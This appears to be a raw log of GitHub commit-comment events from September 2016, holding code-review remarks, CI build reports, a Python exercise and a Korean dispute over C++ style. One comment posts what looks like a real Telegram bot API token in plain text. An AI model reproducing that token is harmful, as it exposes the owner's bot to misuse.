{"id":"4578563566","type":"CommitCommentEvent","actor":{"login":"Moondancer83"},"repo":{"name":"LunaWorks/Orcs-Web"},"payload":{"comment":{"id":19066606,"position":null,"line":null,"path":null,"commit_id":"a5416dbc3da9919740cafdaa6f277197eed45d55","created_at":"2016-09-17T19:56:42Z","updated_at":"2016-09-17T19:56:42Z","body":"You have not comitted the characters.js file!"}},"created_at":"2016-09-17T19:56:42Z"}
{"id":"4578564098","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19066608,"position":null,"line":null,"path":null,"commit_id":"cb11236e685ee38518955ce895390f1e550f0b74","created_at":"2016-09-17T19:57:06Z","updated_at":"2016-09-17T19:57:06Z","body":"Cool! :smiley: :+1: "}},"created_at":"2016-09-17T19:57:06Z"}
{"id":"4578566913","type":"CommitCommentEvent","actor":{"login":"ttwo32"},"repo":{"name":"ptrimble/definitions"},"payload":{"comment":{"id":19066621,"position":3,"line":2,"path":"Gemfile","commit_id":"8d99a1eeb663c886dea4a2d140219911bcff7175","created_at":"2016-09-17T19:59:00Z","updated_at":"2016-09-17T19:59:00Z","body":"I think that simplecov use pid to generate coverage results.\r\nMaybe, JRuby need 'spoon gem' to make process through [ffi](https://github.com/ffi/ffi/wiki) \r\nBut CRuby doesn't need 'spoon gem' because CRuby has a core extension with c lang."}},"created_at":"2016-09-17T19:59:00Z"}
{"id":"4577161116","type":"CommitCommentEvent","actor":{"login":"dgmis"},"repo":{"name":"dgmis/testgit"},"payload":{"comment":{"id":19062439,"position":null,"line":null,"path":null,"commit_id":"b494093b3d592a03e4384d1bd1313f78a8ee1e02","created_at":"2016-09-17T02:04:05Z","updated_at":"2016-09-17T02:04:05Z","body":"ok"}},"created_at":"2016-09-17T02:04:05Z"}
{"id":"4577161948","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19062440,"position":null,"line":null,"path":null,"commit_id":"4116cc5dadff3bc84971acebabffd6815ad0b731","created_at":"2016-09-17T02:04:44Z","updated_at":"2016-09-17T02:04:44Z","body":"Shell 的基本操作"}},"created_at":"2016-09-17T02:04:44Z"}
{"id":"4577164164","type":"CommitCommentEvent","actor":{"login":"zgplvyou"},"repo":{"name":"vlfeat/matconvnet"},"payload":{"comment":{"id":19062444,"position":6,"line":28,"path":"doc/site/docs/about.md","commit_id":"1497e6bdf32bc6622fa1cd4a19b8e601f5f0ab95","created_at":"2016-09-17T02:06:22Z","updated_at":"2016-09-17T02:06:22Z","body":"I think you need change the section ('Obtaining MatConvNet'  )from 'Tarball for version 1.0-beta21' to'Tarball for version latest' because you would get in trouble on Quick Start with 21version of the home page giving. It takes me about one week to find bug and fix it until today———I find the new version. "}},"created_at":"2016-09-17T02:06:22Z"}
{"id":"4577164775","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19062445,"position":null,"line":null,"path":null,"commit_id":"dd333cd77417360a57eef9b9fe61c73419801c39","created_at":"2016-09-17T02:06:50Z","updated_at":"2016-09-17T02:06:50Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2371 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: ZSZ big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-17T02:06:50Z"}
{"id":"4577166676","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19062448,"position":null,"line":null,"path":null,"commit_id":"2ccf51af8c3a589c0177ef4f651fc663db3da345","created_at":"2016-09-17T02:08:18Z","updated_at":"2016-09-17T02:08:18Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2309 of 2472 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-2ccf51af8c3a589c0177ef4f651fc663db3da345-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-2ccf51af8c3a589c0177ef4f651fc663db3da345-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.41%25-yellow.svg)</a> \n"}},"created_at":"2016-09-17T02:08:18Z"}
{"id":"4577167071","type":"CommitCommentEvent","actor":{"login":"zhaoxile"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19062454,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-17T02:08:35Z","updated_at":"2016-09-17T02:08:35Z","body":"Here 're some additions for the problem mentioned yesterday.\r\nNPPS released in Aug 05 can run in that environment perfectly, and NPPS released in Aug 20 also can run but not so perfectly; like scouting function. It will reported a 500 error like that. \r\nAs for others, Reporting 500 like above mentioned in School idol title or Club Members Choose page"}},"created_at":"2016-09-17T02:08:35Z"}
{"id":"4577168682","type":"CommitCommentEvent","actor":{"login":"risha1"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19062458,"position":null,"line":null,"path":null,"commit_id":"fe88638c23486fe1fa2b49a456498c63c53a3e68","created_at":"2016-09-17T02:09:52Z","updated_at":"2016-09-17T02:09:52Z","body":"That would be great "}},"created_at":"2016-09-17T02:09:52Z"}
{"id":"4577169221","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19062459,"position":22,"line":1234,"path":"commands.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-17T02:10:14Z","updated_at":"2016-09-17T02:10:14Z","body":"Yes... I was thinking there was another guard for that but apparently there isn't."}},"created_at":"2016-09-17T02:10:14Z"}
{"id":"4577169910","type":"CommitCommentEvent","actor":{"login":"pedrammh"},"repo":{"name":"pedrammh/shazeh"},"payload":{"comment":{"id":19062462,"position":null,"line":null,"path":null,"commit_id":"47fc20d10e92e65f365593b428effe3967dbfa82","created_at":"2016-09-17T02:10:49Z","updated_at":"2016-09-17T02:10:49Z","body":"HTTP API:\r\n269228081:AAFQ-FJeAn4yqHwCE3R6K6bXl0zTuulX8qM\r\n\r\n"}},"created_at":"2016-09-17T02:10:49Z"}
{"id":"4577171712","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19062468,"position":145,"line":1609,"path":"commands.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-17T02:12:17Z","updated_at":"2016-09-17T02:12:17Z","body":"Yeah, we're using \"globally banned\" because locks are local now."}},"created_at":"2016-09-17T02:12:17Z"}
{"id":"4577172173","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19062471,"position":281,"line":2077,"path":"commands.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-17T02:12:41Z","updated_at":"2016-09-17T02:12:41Z","body":"We probably should, but I always put off creating new permissions. Shoving everything into `editroom` is a lot easier. :p"}},"created_at":"2016-09-17T02:12:41Z"}
{"id":"4577172602","type":"CommitCommentEvent","actor":{"login":"pr0d1r2"},"repo":{"name":"pr0d1r2/plexus"},"payload":{"comment":{"id":19062472,"position":1,"line":1,"path":"bash_profile.d/osx_fix_standard_packages.sh","commit_id":"0cee441e439f9abc85ed1e36f3c83ee8c1a62326","created_at":"2016-09-17T02:13:03Z","updated_at":"2016-09-17T02:13:03Z","body":"Thank you ... Sir 🎩 "}},"created_at":"2016-09-17T02:13:03Z"}
{"id":"4577173277","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19062473,"position":null,"line":null,"path":null,"commit_id":"dd333cd77417360a57eef9b9fe61c73419801c39","created_at":"2016-09-17T02:13:34Z","updated_at":"2016-09-17T02:13:34Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T02:13:34Z"}
{"id":"4577176781","type":"CommitCommentEvent","actor":{"login":"zhujiasheng"},"repo":{"name":"zhujiasheng/cici2"},"payload":{"comment":{"id":19062489,"position":null,"line":null,"path":null,"commit_id":"492780197f3287f3424b9535ac3889dbb3482ade","created_at":"2016-09-17T02:16:35Z","updated_at":"2016-09-17T02:16:35Z","body":"在这个文件里添加了html内容"}},"created_at":"2016-09-17T02:16:35Z"}
{"id":"4577177255","type":"CommitCommentEvent","actor":{"login":"handrews"},"repo":{"name":"json-schema-org/json-schema-spec"},"payload":{"comment":{"id":19062490,"position":null,"line":null,"path":null,"commit_id":"de6fa432d3654b5837ac785a66a31b8ad307232d","created_at":"2016-09-17T02:17:01Z","updated_at":"2016-09-17T02:17:01Z","body":"> But we can just say that in their respective definitions.\r\n\r\nYes, please."}},"created_at":"2016-09-17T02:17:01Z"}
{"id":"4577178860","type":"CommitCommentEvent","actor":{"login":"fleeco"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":19062491,"position":null,"line":null,"path":null,"commit_id":"63129112bbea91f7cd62014f162f857f50084656","created_at":"2016-09-17T02:18:20Z","updated_at":"2016-09-17T02:18:20Z","body":"I prefer the older style."}},"created_at":"2016-09-17T02:18:20Z"}
{"id":"4577179185","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062493,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:18:43Z","updated_at":"2016-09-17T02:18:43Z","body":"코드가 확실히 좀 깔끔해진것같네.\r\n그전에는 이거따로 저거따로 노는 느낌이엿는데.\r\n\r\n그것보다 청크는 어디서 가져오신건가요...\r\nLEA ECX, DWORD PTR[pInstance]\r\nMOV EAX, pFunction;\r\nCALL EAX;\r\n\r\nfastcall??"}},"created_at":"2016-09-17T02:18:43Z"}
{"id":"4577180924","type":"CommitCommentEvent","actor":{"login":"jinzhangA"},"repo":{"name":"nfcpy/nfcpy"},"payload":{"comment":{"id":19062497,"position":null,"line":null,"path":null,"commit_id":"0f59b61c0218571a3421cc5795aeadd28115c17f","created_at":"2016-09-17T02:20:08Z","updated_at":"2016-09-17T02:20:08Z","body":"Still cannot use adafruit pn532 with Pi3. What's the device address?"}},"created_at":"2016-09-17T02:20:08Z"}
{"id":"4577181375","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062498,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:20:29Z","updated_at":"2016-09-17T02:20:29Z","body":"굳이 이상한 방법으로 class하고 합칠 필요가없는데... 왜 이런방식을쓰시는지;;"}},"created_at":"2016-09-17T02:20:29Z"}
{"id":"4577181493","type":"CommitCommentEvent","actor":{"login":"sunghwan2789"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062499,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:20:36Z","updated_at":"2016-09-17T02:20:36Z","body":"커밋 내용대로 멤버함수를 콜백함수로 쓸 방법을 찾다 발견했지ㅋㅋ"}},"created_at":"2016-09-17T02:20:36Z"}
{"id":"4577183423","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062505,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:22:13Z","updated_at":"2016-09-17T02:22:13Z","body":"아니... 이상한것좀 쓰지마요... 누가 정규식에 반하는 코드를 쓰는걸 좋아함...\r\n이런건 어쩔수 없는 상황에서 쓸수밖에 없을때 쓰는거죠 =.="}},"created_at":"2016-09-17T02:22:13Z"}
{"id":"4577183444","type":"CommitCommentEvent","actor":{"login":"alfredocuriel"},"repo":{"name":"fredycuriel/alfredocuriel"},"payload":{"comment":{"id":19062506,"position":null,"line":null,"path":null,"commit_id":"76f9175da6e6c325014367c8645b51db820d3257","created_at":"2016-09-17T02:22:14Z","updated_at":"2016-09-17T02:22:14Z","body":"Por fin"}},"created_at":"2016-09-17T02:22:14Z"}
{"id":"4577183824","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062508,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:22:33Z","updated_at":"2016-09-17T02:22:33Z","body":"에초에 코드를 이해하고 쓰는게 맞긴 합니까!?!?!?"}},"created_at":"2016-09-17T02:22:33Z"}
{"id":"4577185987","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062513,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:24:27Z","updated_at":"2016-09-17T02:24:27Z","body":"이런걸 개선이라고 말하다니... 개선한테 사과하세요"}},"created_at":"2016-09-17T02:24:27Z"}
{"id":"4577186134","type":"CommitCommentEvent","actor":{"login":"natukikazemizo"},"repo":{"name":"natukikazemizo/sedna"},"payload":{"comment":{"id":19062514,"position":null,"line":null,"path":null,"commit_id":"00e76296ad4bb5b7578f2baffa8625e9a6590cca","created_at":"2016-09-17T02:24:36Z","updated_at":"2016-09-17T02:24:36Z","body":"ブランチのテスト"}},"created_at":"2016-09-17T02:24:36Z"}
{"id":"4577188176","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062526,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:26:18Z","updated_at":"2016-09-17T02:26:18Z","body":"제 Core.cpp 코드 한번 보고오시죠;"}},"created_at":"2016-09-17T02:26:18Z"}
{"id":"4577189129","type":"CommitCommentEvent","actor":{"login":"AnaelMobilia"},"repo":{"name":"AnaelMobilia/NextINpact-Unofficial"},"payload":{"comment":{"id":19062532,"position":null,"line":null,"path":null,"commit_id":"3ecb28e3a614986ed6a03108ab9eb376c76df229","created_at":"2016-09-17T02:27:12Z","updated_at":"2016-09-17T02:27:12Z","body":"#191  - ajout d'une image spécifique en cas d'erreur de dl "}},"created_at":"2016-09-17T02:27:12Z"}
{"id":"4577190017","type":"CommitCommentEvent","actor":{"login":"sunghwan2789"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062534,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:27:57Z","updated_at":"2016-09-17T02:27:57Z","body":"그 결론은 hooker를 글로벌에 둔다는 거 맞지?"}},"created_at":"2016-09-17T02:27:57Z"}
{"id":"4577190959","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062537,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:28:47Z","updated_at":"2016-09-17T02:28:47Z","body":"한번쓸걸 class로 만들지 말라는거죠.\r\n"}},"created_at":"2016-09-17T02:28:47Z"}
{"id":"4577191250","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062539,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:29:03Z","updated_at":"2016-09-17T02:29:03Z","body":"꼭 묶어야한다면 namespace로 묶고 주석으로 이유를 달아주고"}},"created_at":"2016-09-17T02:29:03Z"}
{"id":"4577191864","type":"CommitCommentEvent","actor":{"login":"wmathurin"},"repo":{"name":"forcedotcom/SalesforceMobileSDK-Android"},"payload":{"comment":{"id":19062541,"position":null,"line":null,"path":null,"commit_id":"0df018526b781ef913e5698d5700e80988b6906f","created_at":"2016-09-17T02:29:39Z","updated_at":"2016-09-17T02:29:39Z","body":"Should we look at the content type response header to decide?"}},"created_at":"2016-09-17T02:29:39Z"}
{"id":"4577192093","type":"CommitCommentEvent","actor":{"login":"echin6"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19062543,"position":null,"line":null,"path":null,"commit_id":"73e9a483d3cd321fe1f8919f3554debb24073c99","created_at":"2016-09-17T02:29:48Z","updated_at":"2016-09-17T02:29:48Z","body":"Here's an example of a list comprehension that substitutes for reduce():\n\nmiles = [55, 65, 90, 100, 0, -50]\nsum_reduce = reduce(lambda x, y: x+y, miles)\nprint sum_reduce\n\nsum_list = [x for x in [0] for y in miles for x in [x+y]][-1]\nprint sum_list\n\nOn Fri, Sep 16, 2016 at 4:23 PM, Luc Demortier <notifications@github.com>\nwrote:\n\n> RE: 05a-python.md\n> cc: @lucdemortier <https://github.com/lucdemortier> @reshamametis\n> <https://github.com/reshamametis> @aramnath <https://github.com/aramnath>\n> @gfsoileau <https://github.com/gfsoileau> @julialintern\n> <https://github.com/julialintern> @galvin-mj\n> <https://github.com/galvin-mj>\n>\n> Hello @echin6 <https://github.com/echin6>\n>\n> Nice work on Python! Here are some comments:\n>\n>    - Can you give an example of a list comprehension that substitutes for\n>    reduce()?\n>    - String functions (Q6) and list functions (Q7): you need to remove\n>    the raise NotImplementedError at the end of each routine, or else make\n>    it do something useful.\n>    - Function donuts: there is unnecessary indentation at line 7.\n>    - Function both_ends: unnecessary indentation at line 32.\n>    - Function both_ends: you can replace s[s_len-2:s_len] by s[-2:].\n>    - Converting strings to lists is not the most efficient way to\n>    manipulate strings. For example, the function mix_up(a,b) is most\n>    easily implemented by return b[:2]+a[2:]+' '+a[:2]+b[2:].\n>    - Function not_bad does not seem to be working on the examples given...\n>    - I like your implementation of function front_x(words)!\n>    - General comment about defining functions: end them with return s\n>    rather than print s (for example).\n>    - Function linear_merge: here you are just sorting the combined list,\n>    which takes an amount of time of order n*log(n) instead of order n,\n>    where n is the list length. Try to make use of the fact that the given\n>    lists list1 and list2 are already sorted to begin with.\n>    - For the parsing problem (Q8), remember to close a file that you\n>    opened with f = open('football.csv'). Or else use the construct with\n>    open('football.csv', 'r') as f:. In the latter case Python will close\n>    the file for you.\n>\n> 👍\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/echin6/dsp/commit/73e9a483d3cd321fe1f8919f3554debb24073c99#commitcomment-19059909>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATKi7t6cOzzreUIgyiDiQDCYGmZGDve3ks5qqvrYgaJpZM4J_UKL>\n> .\n>\n"}},"created_at":"2016-09-17T02:29:48Z"}
{"id":"4577192219","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062545,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:29:56Z","updated_at":"2016-09-17T02:29:56Z","body":"만약에 그렇게 저런코드를 쓰고싶으면 이해는 적어도 하고씁시다..."}},"created_at":"2016-09-17T02:29:56Z"}
{"id":"4577195223","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062549,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:32:25Z","updated_at":"2016-09-17T02:32:25Z","body":"제생각엔 멤버함수를 호출할때 ECX로 this의 메모리 address를 넘기는것같은데. \r\n그걸 청크가 메뉴얼로 구현한것같네요.\r\n\r\n그냥 thread로 만들면 인수처리를 fastcall 처럼 처리하지 않으니까요.\r\n즉 thread로 인수를 넘겨주면 그걸 LEA ECX, dword ptr[this] 로 다시 ECX로 넘겨주는거죠."}},"created_at":"2016-09-17T02:32:25Z"}
{"id":"4577195449","type":"CommitCommentEvent","actor":{"login":"sunghwan2789"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062550,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:32:33Z","updated_at":"2016-09-17T02:32:33Z","body":"이해는 충분히 하고 썼지~\r\n뭐가 마음에 안 드는 거야??"}},"created_at":"2016-09-17T02:32:33Z"}
{"id":"4577196310","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062553,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:33:20Z","updated_at":"2016-09-17T02:33:20Z","body":"코드 전부다 맘에안듬 =.=!!!!\r\n나보고 쓸데없는 리팩토링을 한다는 말이 나오는게 어이가없을정도로;;;"}},"created_at":"2016-09-17T02:33:20Z"}
{"id":"4577197086","type":"CommitCommentEvent","actor":{"login":"sunghwan2789"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062554,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:34:01Z","updated_at":"2016-09-17T02:34:01Z","body":"전부 다라니ㅋㅋ\r\n삐뚤어졌구만@"}},"created_at":"2016-09-17T02:34:01Z"}
{"id":"4577197574","type":"CommitCommentEvent","actor":{"login":"coderfi"},"repo":{"name":"NinthDecimal/chronos"},"payload":{"comment":{"id":19062555,"position":null,"line":null,"path":null,"commit_id":"74410611b6cc1be9cecc4e40e3dcacfc34a6387d","created_at":"2016-09-17T02:34:26Z","updated_at":"2016-09-17T02:34:26Z","body":"LGTM"}},"created_at":"2016-09-17T02:34:26Z"}
{"id":"4577198104","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062558,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:34:58Z","updated_at":"2016-09-17T02:34:58Z","body":"아니... 누가봐도 저걸 더러운 코드라고 생각할거임...\r\n누가 밥을 손을 꼬아서 뒤로 촤촤촥하고 먹는걸 좋아함... 평범하게 먹는거지;;"}},"created_at":"2016-09-17T02:34:58Z"}
{"id":"4577198258","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":19062559,"position":null,"line":null,"path":null,"commit_id":"7c50c736331817ceb284c57fd81c699b319852dc","created_at":"2016-09-17T02:35:06Z","updated_at":"2016-09-17T02:35:06Z","body":":see_no_evil: "}},"created_at":"2016-09-17T02:35:06Z"}
{"id":"4577199500","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062563,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:36:08Z","updated_at":"2016-09-17T02:36:08Z","body":"나중에 팀프로젝트할때 상사한테 욕좀 많이 드실듯.... 화이팅"}},"created_at":"2016-09-17T02:36:08Z"}
{"id":"4577200207","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062569,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:36:44Z","updated_at":"2016-09-17T02:36:44Z","body":"그리고 나중에 인계해서 그거 받은 인간이 욕좀 많이할듯"}},"created_at":"2016-09-17T02:36:44Z"}
{"id":"4577200881","type":"CommitCommentEvent","actor":{"login":"jalenconner"},"repo":{"name":"jalenconner/custom-minimap-titles"},"payload":{"comment":{"id":19062572,"position":null,"line":null,"path":null,"commit_id":"ce9dd3112b26ab70619c7ca545b981eced41a1d9","created_at":"2016-09-17T02:37:19Z","updated_at":"2016-09-17T02:37:19Z","body":"@facelesspanda because I found them incomplete and I didn't have time to work out a better/more complete list of languages/extensions. I was planning on possibly re-adding them in the future."}},"created_at":"2016-09-17T02:37:19Z"}
{"id":"4577202137","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062573,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:38:20Z","updated_at":"2016-09-17T02:38:20Z","body":"딱봐도 그리고 저 청크 코드도 C 스타일로 만들어진 코드인데 강제로 class화했구만.\r\n뭣때매 그러는건지;;..."}},"created_at":"2016-09-17T02:38:20Z"}
{"id":"4577202571","type":"CommitCommentEvent","actor":{"login":"liu9lin10"},"repo":{"name":"liu9lin10/Python"},"payload":{"comment":{"id":19062575,"position":1,"line":1,"path":"README.md","commit_id":"21958d7cb598342fd723c7156257e6cf879033b2","created_at":"2016-09-17T02:38:43Z","updated_at":"2016-09-17T02:38:43Z","body":"array=[1,6,3,2,5,4]\r\nfor i in range(len(array)):\r\n    for j in range(i):\r\n        print (array[i],\",\",array[j])\r\n        if array[j]>array[i]:\r\n            array[j],array[i]=array[i],array[j]\r\n\r\n    print(array)\r\n        \r\nprint (array)"}},"created_at":"2016-09-17T02:38:43Z"}
{"id":"4577203896","type":"CommitCommentEvent","actor":{"login":"Joanmarie"},"repo":{"name":"Spec-Ops/web-platform-tests"},"payload":{"comment":{"id":19062595,"position":null,"line":null,"path":null,"commit_id":"8af1fa2d39c955df483c7827c2ee19b5cd6f6424","created_at":"2016-09-17T02:40:01Z","updated_at":"2016-09-17T02:40:01Z","body":"@halindrome. Initial ATK ATTA for your consideration. I'll keep working on it. But should be demo-able as-is."}},"created_at":"2016-09-17T02:40:01Z"}
{"id":"4577206965","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19062608,"position":null,"line":null,"path":null,"commit_id":"dd333cd77417360a57eef9b9fe61c73419801c39","created_at":"2016-09-17T02:42:33Z","updated_at":"2016-09-17T02:42:33Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1191 of 1191 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-17T02:42:33Z"}
{"id":"4577209717","type":"CommitCommentEvent","actor":{"login":"sunghwan2789"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062617,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:44:52Z","updated_at":"2016-09-17T02:44:52Z","body":"내가 만날 C#만 만져서 그럼ㅋㅋ\r\n클래스로 묶는 게 좋더랑\r\n"}},"created_at":"2016-09-17T02:44:52Z"}
